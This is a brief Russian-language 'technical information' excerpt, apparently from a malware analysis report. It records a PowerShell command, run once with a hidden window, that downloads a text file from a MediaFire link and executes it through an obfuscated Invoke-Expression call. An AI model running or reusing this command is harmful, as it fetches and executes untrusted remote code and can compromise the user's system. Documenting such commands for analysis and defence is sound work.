Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $(iwr https://www.mediafire.com/file/xnqxmqlcj51501d/7000m.txt/file -uSEB -UseDefaultCredentials) | &('AJSAMSJWWUAU'.replace('AJSAMSJWWUAU','I')+'kosduisjd'.replace('kosduisjd','EX'))
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $(iwr https://www.mediafire.com/file/xnqxmqlcj51501d/7000m.txt/file -uSEB -UseDefaultCredentials) | &('AJSAMSJWWUAU'.replace('AJSAMSJWWUAU','I')+'kosduisjd'.replace('kosduisjd','EX')) (со скрытым окном)